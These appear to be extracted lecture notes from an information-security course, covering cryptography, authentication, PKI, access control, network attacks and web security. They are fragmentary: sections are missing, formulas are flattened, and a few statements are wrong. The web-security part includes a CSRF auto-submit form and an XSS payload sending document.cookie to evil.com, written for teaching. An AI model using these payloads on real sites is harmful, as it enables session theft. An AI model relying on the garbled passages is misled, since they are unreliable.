COS432 InfoSec
COS432 InfoSec
Contents
1 Message Integrity 2
Sending messages . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
Do PRF’s exist? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
Cryptographic Hash Functions . . . . . . . . . . . . . . . . . . . . . . . . . . 5
Timing Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
Multiple Alice - Bob messages . . . . . . . . . . . . . . . . . . . . . . . . . . 6
2 Randomness 7
Randomness as a system service . . . . . . . . . . . . . . . . . . . . . . . . . 9
Message Confidentiality . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
Confidentiality and integrity . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
3 Block ciphers 13
128-bit AES . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
How to handle variable-size messages . . . . . . . . . . . . . . . . . . . . . . 16
5 Key Management 23
How big should keys be? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
Key management principles . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
6 Authenticating people 27
Something you know: passwords . . . . . . . . . . . . . . . . . . . . . . . . . 27
Something you have . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
Something you are . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
Certificates . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
Naming and identity verification . . . . . . . . . . . . . . . . . . . . . . . . . 34
Anchoring . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
Revocation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
8 Access control 36
Subjects and labels . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
Traditional Unix File Access . . . . . . . . . . . . . . . . . . . . . . . . . . . 38
Capabilities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38
Logic-based authorization . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39
11 Spam 48
Economics of spam . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48
Anti-spam strategies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49
12 Web Security 53
Browser execution model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 53
Cookies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54
CSRF: Cross-Site Request Forgery . . . . . . . . . . . . . . . . . . . . . . . 54
Cross Site Scripting (CSS) . . . . . . . . . . . . . . . . . . . . . . . . . . . . 55
SQL injection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 56
13 Web Privacy 57
Third parties . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 57
Tagging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 58
Fingerprinting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 58
More ways for websites to get your identity . . . . . . . . . . . . . . . . . . . 59
How security bugs contribute to online tracking . . . . . . . . . . . . . . . . 60
Defenses . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 60
14 Electronic voting 62
3
21 Economics of Security 72
Definitions of Efficiency . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72
Market Failures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72
Solutions to Market Failures . . . . . . . . . . . . . . . . . . . . . . . . . . . 74
23 Quantum Computing 80
Classical Bits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80
Quantum Bits (qubits) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80
Multi-qubit systems: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81
Advantages of QC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81
Implications for crypto . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 82
Quantum Key Exchange . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 82
24 Password Cracking 84
Elementary Methods . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84
Rainbow Tables . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84
4 1 Message Integrity
1 Message Integrity
Sending messages
m ?
Alice −
→ Mallory →
− Bob
Threat Models:, what adversary can do and accomplish vs. what we want to do and
accomplish. We generally assume that Mallory is malicious in the most devious possible
way, as opposed to random error. In this case of Alice sending Bob a message:
• Mallory can see and forge messages
• Mallory wants to get Bob to accept a message that Alice didn’t send
• Alice and Bob want Alice to be able to send a message and have Bob receive it
in an untampered form.
CIA Properties
• Confidentiality: trying to keep information secret from someone
• Integrity: making sure information hasn’t been tampered with
• Availability: making sure system is there and running when needed (hardest to
achieve!)
What to send:
input output
∅ 01011... ← 256 coin flips
0 101...
1 ...
f is a secure MAC if and only if every efficient (polytime) strategy for Mallory
wins with negligible (probability that goes to 0) probability. In other words, f is
a secure MAC if Mallory can’t do better than random guessing.
Kerckhoffs’s principle:
Use a public function family and a randomly chosen secret key. Advantages:
f is a PRF if and only if every efficient strategy for Mallory wins with probability
less than 0.5 + where is negligible.
Note: Mallory can always win by exhaustive search of the range of k in f (k, x),
so need to limit Mallory to “practical”
Do PRF’s exist?
They include MD5, SHA-1, SHA-?, etc: functions that take arbitrary size inputs and
return fixed size outputs that are “hard to reverse.” They are dangerous to use directly
because they don’t have the properties you think/want then to have.
Timing Attacks
Suppose Alice and Bob implement MAC-based integrity with the following code
8 1 Message Integrity
How to deal with Mallory sending messages out of order or resending old messages
1. append sequence number to each message:
Alice sends m00 = (0, m0 ), m01 = (1, m1 )
2. switch keys per message
2 Randomness 9
2 Randomness
Best way to get a value that is unknown to an adversary is to choose a random value,
but it’s hard to get this in practice. Randomness (or a lack thereof) is often a weakness
in a security system.
Two views:
1. family of functions fk (x)
2. function f (k, x). This is the view we’ll be using for this class.
True randomness:
• outcome of some inherently random process
• assume it “exists” but it’s scarce and hard to get
In security, ”random” means unpredictable:
• to whom? E.x., in a PRF, the result can be considered random with respect to
someone who does not know the secret key.
• when?
Pseudorandom generator (PRG):
• takes a small “seed” that’s truly random as input E.x. a few coin flips, instead
of flipping a coin each time
• generates a long sequence of “good enough” values, i.e. unlimited pseudoran-
domness.
• maintains “hidden state” that changes as generator operates
• output is indistinguishable from truly random output in the practical sense, i.e.
an efficient party can not distinguishs
• the generator needs to be deterministic, because if it is not it must be driven by
some kind of randomness, and the reason we are doing this is because randomness
is scarce
Randomness service:
• OS service, callable by application
10 2 Randomness
Note that if an adversary breaks in at time t, they can play it forward and see the
outputs at time t + x
Most PRGs are made up of an init function to initialize state S and an advance
function to step to a new state.
NOTE: The advance function should be performed after generating an output, and not
the other way around. If you do not advance after generating the output, the hidden
state that was used to generate the most recent output stays in memory. If at any time
between this and the next time you generate a new output the adversary is able to
compromise your system, they would learn the hidden state and are able to reconstruct
the last output (not backtracking resistant!).
Hard parts: getting seed, recovering from compromise, even if we don’t know whether
the state has been compromised. We want to be continuously recovering because we
might not notice a compromise.
Create a new function, recover(S, randomdata) → state
• recover/renew the state (mix fresh randomness in with hidden state) using PRF,
to re-establish secrecy of hidden state
NOTE: Mistake to add a single bit at a time since Mallory can keep up with 2
possibilities at a time, but if we wait until have a lot, say 256 bits of randomness,
then Mallory can’t keep up (2256 possibilities), even if she knows the algorithm
used.
Hard to estimate actual amount of entropy in pool, so wait for too much randomness
before mixing to remain conservative.
There’s also a problem with “headless” machines, like servers, that don’t have enough
areas of randomness to draw from.
Linux:
• /dev/random gives pure random bits, but have to wait
• /dev/urandom is output of PRG, renewed via “pure” randomness
The boot problem: At startup,
• least access to randomness (system is clean)
• highest demand for randomness (programs want keys)
Solutions (with their problems):
• save some randomness only accessible at boot:
hard to tell that this hasn’t been observed, or used on last boot
• connect to someone across network to give pseudorandomness:
want secure connection but don’t yet have key (okay if have just enough for that
key, or semi-predictable and hope Mallory doesn’t guess)
Message Confidentiality
Now may
have a(passive)
adversary/eavesdropper Eve who can only listen:
Alice → Bob
↓
Eve
Message processing:
plaintext ciphertext plaintext
−−−−−→ E (encrypts) −−−−−→ D (decrypts) −−−−−→
↑ ↑
key k key k
2 Randomness 13
Goal: ciphertext does not convey anything about plaintext. Bob can recover text, Eve
cannot.
Semantic Security
“Encryption game” against Eve:
Allow Eve to pick piece of plaintext, we provide encryption Ek (xi ) until she
is satisified Eve chooses two pieces of plaintext
We flip a coin and encrypt one of them
Eve guesses which was encrypted: wins if right
We say that the encrpytion method is secure if Eve can’t do better than random
guessing (50/50) + negligible . This is known as semantic security.
Note: if we were being more rigorous in our definitions, we would use a stronger defi-
nition of security for encryption here so that it’s easier to combine later with integrity.
However, the methods we are learning are secure by any of the definitions.
Few approaches.
1. Use E(x || M(x)) SSL/TLS
2. Use E(x) || M(E(x)) IPSec **This is the winner (because math).
3. Use E(x) || M(x) SSH
If we have only one shared key, we seed the PRG with the shared key and then use
four values it produces for the message sending.
3 Block ciphers 15
3 Block ciphers
Challenge: design a very hairy function that’s invertible, but only by someone who
knows the key. A PRP will have this property.
Add as many rounds as you want, alternating left and right rounds.
Why? Easy to invert since each round is its own inverse, so inverse of series of rounds
is the same series in reverse order. This makes it so that f can be as difficult as we
want and the process is still invertible, so why not make f a PRF?
Example. AES (Advanced Encryption Standard) Probably the best available today,
coming from overcoming drawbacks of DES
• software efficiency a goal
• large, variable key size (128-, 192-, 256-bit variants)
• open, public process for choosing and generating the cipher
run by NIST and a design contest judged on pre-determined criteria
2002 - NIST chose Rijndael (Belgian designers)
128-bit AES
think of 128-bits as 4x4 array of bytes: shift the ith row left i steps; values
that fall off wrap around the same row. (circular shift)
spreads out columns
3. linear mix (“diffusion”):
take each column, treat as 4-vector and multiply by a certain matrix (spec-
ified in standard)
mixes within column
4. key-addition step (key-dependent):
xor each byte with corresponding byte of the key
Note: the key expansion could be a source of weakness (to get the ten keys
needed from one)
• to decrypt, do inverses in reverse order
Problems:
• padding - plaintext not a multiple of blocksize
• “cipher modes” - dealing with multi-block messages
Padding: most important property needs to be that recipient can unambiguously tell
what is padding and what is not
Good method: add bits 10* until reach end of block (pull off all 0’s at end then the 1).
Remember that you must add some padding (at least one bit) to every message. This
works similarly with bytes.
Ci = E(k, Pi )
Ci = (Ri , E(k, Ri ⊕ Pi )
3 Block ciphers 19
Ci = E(k, Ci−1 ⊕ Pi )
What about the first block? Generate a random value, the “initialization vector
(IV)”, to prepend to message to serve as C−1 . Don’t want to reuse with same
key, or adversary could compare the first block of the ciphertext to see if same
plaintext, but random-ish generation good enough, and can use same key over
and over.
• CTR (Counter mode): Generally agreed on as best to use. Similar to a stream
cipher.
Ci = E(k, messageid||counter) ⊕ Pi
messageid must be unique, then it’s okay to reuse key.
Note: this would not be forward secret as a PRG.
Reasons to use CTR over PRG: more efficient on commodity hardware and per-
haps you trust AES more than your PRF (even though you can’t prove it either
way).
20 4 Asymmetric key cryptography
RSA algorithm
2. Define N = pq
Useful fact: if p, q are prime, for all 0 < x < pq,
x(p−1)(q−1) mod pq = 1
RSA((e, N ), x) = xe mod N
RSA((d, N ), x) = xd mod N
Proof.
• It’s slow (∼1000x slower than symmetric); you’re exponentiating huge numbers
• Key is big (∼4k bits)
22 4 Asymmetric key cryptography
Secure RSA
Problem 1:
Suppose (e, N ) = (3, N ). Given ciphertext 8 that was encrypted with (3, N ) it’s trivial
that x3 mod N = 8 has x = 2. This shows that you may run into trouble when
encrypting small messages.
Problem 2 (Malleability):
RSA((d, N ), xy) is the signature for the message xy! Adversary could use this to win
the game defining security of the cipher
Definition. Malleability
Adversary can manipulate ciphertext, get predictable result for decrypted plaintext.
This is usually bad, but sometimes we want a malleable cipher (for some application)
Lesser problems:
• Same plaintext results in same ciphertext (deterministic)
• No built-in integrity check
4 Asymmetric key cryptography 23
To solve all these problems, add a preprocessing step before encryption. The standard
way is call OAEP (Optimal Asymmetric Encyption Padding):
1. Generate 128 bit random value, run through PRG G
2. XOR with message padded with 128 bits of zeros
3. Run result through PRF H, a hash function with announced key
4. XOR with the random bits
5. Concatenate result and send to RSA encyption
128 bits 128 bits
message | 000... random
↓ ↓
⊕ ←− G ←− ↓
↓ ↓
↓ −→ H −→⊕
↓ ↓
↓
to RSA encrpytion
Reject if z 0 is not all zero, otherwise throw away r0 and let m0 be the result of the
decyption. m0 should at this point be equal to the original message.
Other things to clean up:
• Key size
– To get a big enough key space, need lots of possible primes
– Factoring is better than brute force
– Factoring algorithms might get better, so build in cushion in key size to
account for incremental improvements in these algorithms.
24 4 Asymmetric key cryptography
5 Key Management
US for a long time put restrictions on export of cryptographic software, the same
restrictions as munitions, requiring a special license.
Java, for example, would have liked to include crypto along with runtime libraries but
hard to get license. Possible solutions:
• plugin architecture: could plug-in if they have their own
• designed libraries in a way convenient for people who want to implement their own
crypto (export general purpose math library without the export-control issues.
←−−−−−−−−−−−−−
agree on g, p (public),
p = 2q + 1, q prime (“safe prime”)
random a, random b,
time
1<a<p−1 1<b<p−1
g a mod p g b mod p
−−−−−→←−−−−−
a
g b mod p mod p (g a mod p)b mod p
= g ba mod p = g ab mod p
Adversary’s best attack is to try to solve the discrete log problem. So Alice and Bob
know something that nobody else knows.
In practice, use H(g ab mod p) as a shared secret.
BUT: works against an evesdropper (“passive adversary”, “Eve”) but insecure if ad-
versary can modify messages (“man in the middle”, ”MITM” attack).
Upshot: D-H gives you a secret shared with someone.
Solution:
1. Rely on physical proximity or recognition to know who’s talking
2. Consistency check: check that A, B end up with the same value g ab or that A, B
saw the same messages.
5 Key Management 27
How?
Use digital signature (by one party, typically the server)
If Bob can verify Alice’s signature, but not the other way around, this still works (say
Alice is a well-known server).
This gives two properties at once:
• A authenticates B or vice verse
• No MITM, so A and B have a shared secret
D-H and forward secrecy:
Suppose Alice, Bob already have a shared key and want to negotiate a new key. Then
they can do a simple D-H key exchange, protected by old key, then get new key.
If an adversary doesn’t know the old key, can’t tamper with the D-H messages. Even
if the adversary gets an old key, not knowing the old key in real time means Mallory
can’t attack the D-H exchange, and can only be a passive adversary. So Alice and Bob
get forward secrecy with relatively low cost.
Another problem, similar to MITM:
6 Authenticating people
SHA-3
NIST: 1997 new standardization effort to pick SHA-3
recently keccak picked
• fast to implement to implement in software, and really fast in hardware
• in practice, probably will be implemented in software, but brute force search to
break it will probably be done in hardware – slight conspiracy theory that NIST
picked so as to advantage attackers with larger resources
Guessing is a serious problem in practice: people pick lousy passwords, and attackers
get more powerful all the time by Moore’s law
Reducing guessability:
• hard to quantify guessability
• only sure way: make password random, chosen from a large space (these are
usually hard to remember)
• format rules (e.g. special character and at least one uppercase character)
• require password to be longer (probably better than format rules)
Password hygiene
• like key hygiene
• change periodically and avoid patterns (“password1”, “password2”, ...)
• expire idle sessions (walk-away problem)
• require old password to change password
What if user forgets password?
• if hashed password is stored, can only set a new one
• else, can tell them password, BUT how do you know it’s not an impostor?
• clever solution by Gmail: if all else fails, we’ll give you a new password, but you’ll
need to wait before trying to log in again. Then legitimate user may log in and
see a warning during that time
Preventing spoofing:
• multi-factor authentication: password + something else (e.g. token, app)
• Evidence-based (Bayesian) authentication: treat password entry as evidence, but
not 100% certainty
– then use as much other evidence as possible (e.g. geolocation)
– other examples: device identity, software version, behavior patterns (espe-
cially atypical behavior)
– if confidence is too low, get more evidence
• distinctive per-user display
• distinctive unspoofable action before login
Windows CTRL-ALT-DEL before every time you enter password, always taking
you to legitimate login screen
32 6 Authenticating people
user system
password (p) random challenge (r)
name
−−−→
r (random)
←−−−−−−
PRF(p,r)
−−−−−→
Definition. biometric
Measuring aspect of user’s body: fingerprint, iris scan, retina scan, finger length, voice
properties, facial features, hand geometry, typing patterns, gait
6 Authenticating people 33
Basic scheme:
• enroll user: take a few measurements, compute “exemplar”
• later, when user presents self, measure, compare to exemplar; compute “distance”
to exemplar
• if “close enough”, accept as valid user, else reject: tradeoff in threshold between
false accepts and false rejects
Drawbacks:
• hard/impossible to follow good key hygiene (can’t change aspects of user’s body)
• often requires physical presence
• spoofing attacks; make image of body part, faking tempertature, inductance, etc.
(melted gummy bears moulded into finger-shape...)
• measurement is only approximate (need to control false positives and false neg-
atives)
• publicly obversable (eg. DNA, fingerprints)
34 7 SSL/TLS and Public Key Infrastructure
Observations on trust
Another problem
How does Firefox know that Facebook’s cert was signed by Verasign? Because Facebook
said so!
So what if Facebook provides a different cert authority?
Theory: We would only accept it if we trust the new CA
Pracice: Firefox comes with a list of trusted CAs. However, if any one of them is
malicious, it can certify any other malicious urls and you are screwed.
Attacks
If there exists an adversary (let’s call it NSA, for non-specific adversary) and a rogue
CA, how might they MITM you?
1. Issue rogue certs for target sites
2. Select users ot target, install MITM boxes at their ISP(s)
How are these attacks detected?
1. Browser remembers old cert and alerts server if “something’s wrong” ie. the new
one seems suspicious
2. Server notices lots of users logging in from the same IP (or better, the same
device fingerprint)
Because it’s easily detected, having a NSA MITM-ing seems pretty uncommon.
Certificates
Binds an entity to a public key. Signed by some issuer (CA) and contains identity of
issuer and an expiration time.
How does a server obtain a cert? The server generates a key pair and signs its
public key and ID info with its private key to prove that server holds the private key;
also provides message authentication.
The CA verifies the server’s signature using the server’s public key. Hard problem:
How do you know that it’s actually the server that’s sending the info?
The CA then signs the server’s public key with CA key which creates a binding. It the
server can verify the key, ID, and CA’s signature, it’s good to go.
Almost all SSL clients except browsers and key SSL libraries are broken, often in hi-
larious ways.
Three hard problems
1. Naming and identity verification. How do you know that whoever is requesting
a certificate is who they say they are?
2. Anchoring. Who are the roots that are trustworthy?
3. Revocation. If something goes wrong, how can they shut off a certificate?
Zooko’s Triangle
For any naming system, you want it to be unique, human-memorable, and decentral-
ized. Pick 2, because you can’t get all 3.
Example. Real names are not unique. Domain names are not decentralized. Onion
addresses are not human memorable.
Anchoring
Which roots should you trust? If you can issue certs, you can run MITM attacks on
certs.
Revocation
This is different from expiration (which is for normal key hygiene). It involves
1. Authenticating the revocation request
If you’re not careful, it is an easy DOS! Also can’t ask for an old key because the
entity might not have it.
Solution: Sign a revocation request every time you get a new key and “lock
away” this request. If anything happens, you can send the revocation request.
2. Keeping clients up to date
Offline model: Certificate revocation list; issue an “anti-certificate”
Online model: OCSP (online cert status protocol) is a CA’s server that can be
queried for certificate statuses in real time
Note that revocation often fails in practice. Most browsers only check for EV certs,
which can be 6 months out of date.
So what happens when a CA doesn’t respond? What should your browser do?
• Can’t just not give you access; this would mean that the entire internet is broken
when CA is down.
Sites like Facebook are probably better at keeping their site up than VeriSign. Also,
it’s an easy DOS attack to take down a CA.
Result: Browser just goes ahead if CA is down.
38 8 Access control
8 Access control
How you reason about and enforce rules about who’s allowed to do what in the system.
This deals with authentication (Who is asking?), not authorization (Does that per-
son have permission?).
V1 , V2
userid. Alice runs a program written by Bob (example: Alice uses a text editor
written by Bob to edit Alice’s secret file). What label?
– If treat as Alice: Bob’s code can send Alice’s secret data to Bob
– If treat as Bob: Alice can’t edit her secret file, can read Bob’s files
– If treat as Bob but special for this file: none of the labelling benefits
– If treat as intersection of privileges: get all the drawbacks
• Common approach in OS (e.g. Linux): setuid bit
– Bob decides whether program runs as himself or invoker
Store access control info:
• as AC matrix - note that this will be very sparse
• as “profiles” - for each user, list of what subject can do (i.e. row of AC matrix)
• as Access Control List (ACL) - for each object, list of (Verb, Subject) pairs (who
can do what to it). This is typically used because small and simple in practice.
Often, ACL are stored along with object.
Who sets policy?
• centralized (“mandatory”) - done by an authority
(+) done by a well-trained person
(+) might be required (ethical, legal, or contractual obligations)
(–) inflexible, slow
• decentralized (“discretionary”) - each object has an owner, owner set ACLs
(+) flexible
(–) every user makes security decisions (mistake-prone)
• mix - owner can choose, within limits set by centralized authority
Groups and Roles:
Group is a set of people with some logical basis; role is group with one member
Advantages:
• makes ACL smaller, easier to understand
• change in status naturally causes change in access to resources
• ACL encodes reason for access in system (i.e. why you have access)
Roles can be hidden temporarily, “wearing different hats” (useful for testing)
40 8 Access control
ACL for each operation contains subset of {user, group, everyone}. Every VERB re-
quires 3 bits for each operation.
Capabilities
Tradeoffs:
• cryptographic
(+) totally decentralized
(–) if capability leaks, big trouble
want some kind of revocation, but hard to do
• OS table
(+) can control flow of passage of capabilities
(+) revocation is much easier
(–) centralized, requires overhead, lack of flexibility,
8 Access control 41
Logic-based authorization
Lattice model
Definition. Lattice
(S, v), S: set of states, v: partial order such that for any a, b ∈ S, there is a least
upper bound of a, b and a greatest lower bound of a, b.
partial order:
• reflexive: a v a
• transitive: a v b and b v c, then a v c
• asymmetric: a v b and b v a, then a = b
least upper bound of a, b:
• a v U and b v U and for all V ∈ S, a v V and b v V ⇒ U v V
greatest lower bound of a, b:
• L v a and L v b and for all V ∈ S, V v a and V v a ⇒ V v L
Example. Lattices
1. linear chain of labels:
public v confidential
unclassified v classified v secret v top secret
2. compartments (e.g. project, client ID, job function)
state is set of labels, v is subset
3. org chart
state is node in chart, v is ancestor/descendant
4. combination/cross product of lattices
state is (S1 , S2 ), (A1 , B1 ) v (A2 , B2 ) iff A1 v A2 and B1 v B2
At each point in the program, every variable has a state/label (that comes from the lat-
tice we’re using). Inputs are tagged with state. Outputs are tagged with a requirement.
States are propagated when code executes.
Example: a = b+c; State(a) = LUB(State(b), State(c)) [LUB = Least Upper Bound]
44 9 Information flow and multi-level security
Before providing output, check that state of output value is consistent with policy. (For
example, only allowed to emit unclassified output.) Formally, ensure that label(v) v L,
where L is the required policy.
But this isn’t enough (only monitoring and rejecting when inconsistent with policy) –
“dog that didn’t bark”:
// State(a) = ‘‘secret’’
// State(c) = State(d) = public
b = c;
if (a > 5) b = d; // Requires static (compile-time) analysis to get right
output b; // Says something about a, so should be labelled as secret
Static analysis won’t catch all, but will catch some of the leaks.
Problem 1: conservative analysis leads to being overly cautious
Problem 2: timing might depend on values (can lead to covert channel attacks)
What if you can’t prevent a program from leaking the information it has?
Conservative assumption (contagion model): every programs leaks all its inputs to all
its outputs.
Bell-LaPadula model: lattice-based information flow for programs and files
• every program has a state (from lattice): what it’s allowed to access
• every file has a state: what it contains
• Rule 1: “No Read Up” - Program P can read File F only if State(F ) v State(P )
• Rule 2: “No Write Down” - Program P can write File F only if State(P ) v
State(F )
Theorem. If State(F1 ) v State(F2 ) and the two rules are enforced, then information
from F2 cannot leak into F1 .
Problems:
1. exceptions (need to make explicit loopholes in system to allow)
• declassify/unprotect old data
• what about encryption (hope ”secret” ciphertext doesn’t leak plaintext)
• aggregate/“anonymized” data
• policy decision to make exception
2. usability - system can’t tell you if there are classified files in a directory you’re
trying to delete or no space on disk for you to add a file
3. outside channels - people talk to each other outside the system
9 Information flow and multi-level security 45
This, so far, has been about confidentiality. Can we do the same thing for integrity?
• State: level of trust in integrity of information
• ensure high-integrity data doesn’t depend on low-integrity inputs (try to avoid
GIGO problem)
Biba model: (B-LP for integrity)
• Label/state: how much we trust program with respect to integrity/how important
file is
• Rule 1: “No Read Down”
• Rule 2: “No Write Up”
B-LP model and Biba model at the same time?
• if use same labels for both (high confidentiality = high integrity), then no com-
munication between levels
• if different labels, then some information flows become possible, but could result
in being much more difficult for users
• result: usually focus on confidentiality or integrity and let humans worry about
this outside of the system
Back to crypto...
Secret sharing:
• divide a secret into “shares” so that all share are required to reconstruct secret
– 2-way: pick a large value M , secret is some s, 0 ≤ s < M
pick r randomly, 0 ≤ r < M
shares are r, (s − r) mod M
to reconstruct, add shares mod M
– k-way: shares r0 , r1 , . . . , rk−2 random, (s − (r0 + · · · + rl−2 )) mod M
– can also construct degree k polynomials such that k values are needed to
reconstruct
• suppose RSA private key is (d, N ), shares (d1 , N ), (d2 , N ), (d3 , N ) such that d1 +
d2 + d3 = d mod (p− 1)(q− 1)
X d1 mod N X d2 X d3 = X (d1 +d2 +d3 ) mod (p−1)(q−1) mod N = X d mod N
(splits up an RSA operation)
46 10 Securing network infrastructure
Prefix Hijacking
How to defend?
Can crypto help? Remember that AS’s can lie about their own links and costs and
about what other nodes said. So, crypto can prevent lying about what neighbors said
but it can’t prevent lying about your own links.
Routing relies on trust
It is a different adversary model compared to application-layer security.
• small number of AS’s
• AS’s are well known
• and physically connected
• AS’s also don’t want to advertise shorter paths than reality because then they
will likely be overloaded with traffic and go down
All of the above are natural protection against attacks. It’s not an ideal setup, but it’s
not terrible either. Is there a much better way to design BGP if we were to do it over?
Unclear.
IP packet
These contain source and destination IP addresses. Can these things be spoofed?
• source IP? yes
• destination IP? no, that doesn’t even make sense
Nodes can only verify claimed source address back one hop; this is why IPs are spoofa-
ble. For example, DoS attacks spoof their return IP addresses.
Ingress/egress filtering
Egress filtering: discard outgoing packet if source IP is outside. This protects against
types of DoS if adversary takes over internal computer and tries to send DoS packets.
Protects the rest of the internet.
DDoS is easy if you have a lot of zombies
More difficult: DoS from a single machine with more traffic than machine is capable
of. So the goal? Amplication of traffic volume.
Smurf attack
Attacker broadcasts ECHO request with spoofed source IP address (this is the victim’s
IP address). All networks hosts (broadcast recipients) hear broadcast and respond.
Except they respond to the victim, who is overwhelmed with traffic.
DNS attacks
DNS: The system that takes a domain name and translate it into an IP address.
User requests example.com → recursive name server → root server → recursive name
server → TLD name servers → recursive name server → thousands of name servers
→ recursive name server → 192.168.31
Root servers
Requests are delivered to the root server who is closest and available.
Cache poisoning
In the words of Wikipedia: “DNS spoofing (or DNS cache poisoning) is a computer
hacking attack, whereby data is introduced into a Domain Name System (DNS) re-
solver’s cache, causing the name server to return an incorrect IP address, diverting
traffic to the attacker’s computer (or any other computer).”
Prevention: DNSSEC
11 Spam
Focus on email.
Scope of problem:
• Vast majority of email is spam (99+%)
• Lots is fraudulent (or inappropriate)
• 5% of US users have bought something from a spammer
The anonymity makes this attractive for certain kinds of products
• Spamming often pays (low cost to send, so need little success to profit)
Review: how email works
• Messages written in standard format
– Headers: To, From, Date, ...
– Body: can encode different media types in body
• Traditionally:
sender’s SMTP sender’s SMTP recipient’s IMAP recipient’s
−−−→ −−−→ −−−→
computer MTA MTA computer
(MTA: Mail Transfer Agent)
• Webmail model:
sender’s recipient’s HTTP(S)
sender’s HTTP(S) SMTP recipient’s
−−−−−→ mail −−−→ mail −−−−−→
computer computer
service service
• More complexities:
– Forwarding
– Mailing lists
– Autoresponders
Economics of spam
Anti-spam strategies
Definition. Spam
1. Email the recipient doesn’t want to receive
Problems:
• Defined after the fact
• Legally problematic (anyone can say they didn’t want some message)
• Not what you want (just not wanting it doesn’t make it spam)
2. Unsolicited email
Problems:
• What does this mean? (May not explicitly have asked for a given email)
• Lots of unsolicited email is wanted
3. Unsolicited commercial email
Problems: less than in definition 2, but still the same issues
12 Web Security
Note: see piazza for lecture slides
Two sides of web security
1. browser side
2. web applications
• written in php, asp, tsp, ruby, etc.
• include attacks like sql injection
Some web threat models include passive or active network attackers, and malware
attackers, who control a user’s machine by getting them to download something.
1. Load content
2. Renders (processes html)
3. Responds to events
• User actions: onClick, onMouseover
• Rendering: onLoad
• Timing: setTimeout(), clearTimeout()
Javascript
There are three ways to include javascript in a webpage: inline <script>, in
a linked file <script src="something" >, or in an event handler attribute <a
href="example.com" onmouseover="alert(‘hi’)" >
The script runs in a “sandbox” in the front end only.
Same-origin policy
Scripts that originate from the same SERVER, PROTOCOL, and PORT may access
each other/each other’s DOMS with no problem, but they cannot access another site’s
DOM. The exception to this is when you link js with a <script src="" >.
The user is able to grant privileges to signed scripts (UniversalBrowserRead/Write)
Frame and iFrame
A Frame is a rigid division. An iFrame is a floating inline frame. They provide
structure to the page and delegate screen area to content from another source (like
56 12 Web Security
youtube embeds). The browser provides isolation between the frame and everything
else in the DOM.
Cookies
After a request, a server might do set-cookie: value. When the browser revisits
the page, it will GET ... cookie: value and the server responds based on that
cookie.
Cookies hold unique pseudorandom values and the server has a table of values. So,
cookies are often used alongside authentication. BUT it’s only safe to use cookie au-
thentication via HTTPS; otherwise, someone can read the “authenticator cookie”.
The same browser runs a script from a good site and malicious script from a bad site.
Requests to the good site are authenticated by cookies. The malicious script can make
forged requests to the good site with the user’s cookie.
• Netflix: change account settings
• Gmail: steal contacts
• potential for much bigger damage (ie. banking)
How might this happen?
1. User establishes session with victimized server
2. User visits the attack server
3. User receives malicious page
<form action="victimized server page form">
<input> fields </input>
</form>
<script> document.forms[0].submit() </script>
4. attack server sends forgest request to victimized server via the user and this form
Login CSRF
Attacker sends request so that victim is logged in as attacker. Everything the victim
does gets recorded on the attacker’s account; or, if the victim is receiving incoming
payments/messages, the attacker will get them.
CSRF Defenses
12 Web Security 57
To prevent login CSRF, you want strict referer validation and login forms sub-
mitted over HTTPS. HTTPS sites in general use strict referer validation. Other
sites use ROR or frameworks that implement this stuff for you.
• Custom HTTP header. X-Requested-By: XMLHttpRequest
<frame src="naive.com/hello?name=
<script>window.open(’evil.com/steal.cgi?cookie=’’ + document.cookie)</script>
">
Then, naive.com is opened and the script is executed, where the referer looks like
naive.com. The naive.com cookie is sent as a parameter in a request to evil.com, and
steal.cgi is executed with the cookie.
SQL injection
Defenses
• Input validation
Filter out apostrophes, semicolons, %, hyphens, underscores. Also check data
type (eg. make sure an integer field actually contains an int)
• Whitelisting
Generally better than blacklisting (like above) because
– you might forget to filter out certain characters
– blacklisting could prevent some valid input (like last name O’Brien)
– allowing only a well-definied set of safe values is simpler
• escape quotes
• use prepared statements
• Blind variables:
? placeholders guaranteed to be data and not a control sequence
13 Web Privacy 59
13 Web Privacy
Note: see piazza for lecture slides
Third parties
Third parties (ie. not the site you’re visiting), typically invisible, are compiling profiles
of your browsing history. There is an average of 64 tracking mechanisms (visible) on a
top 50 website, and possibly more invisible ones!
Why tracking?
Behavioral targeting: Send info to ad networks so that user interests are targeted.(Online
advertising is a huge and complicated industry)
Trackers include cookies, javascript, webbugs (1px gifs), where a third party domain is
getting your information.
The market for lemons
George Akerlof, 1971
”Why do people still visit websites that collect too much data?”
